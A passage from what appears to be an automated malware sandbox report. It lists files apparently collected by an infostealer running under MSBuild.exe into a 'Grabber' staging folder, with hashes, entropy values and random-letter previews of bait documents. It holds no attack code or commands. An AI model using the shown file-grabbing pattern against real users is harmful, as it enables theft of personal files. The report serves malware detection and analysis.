Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\MXPXCVPDVN.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\NEBFQQYWPS.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\SFPUSAFIOL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\UOOJJOZIRH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EEGWXUHVUG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GAOBCVIQIJ.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GAOBCVIQIJ.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Downloads\IPKGELNTQY.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMM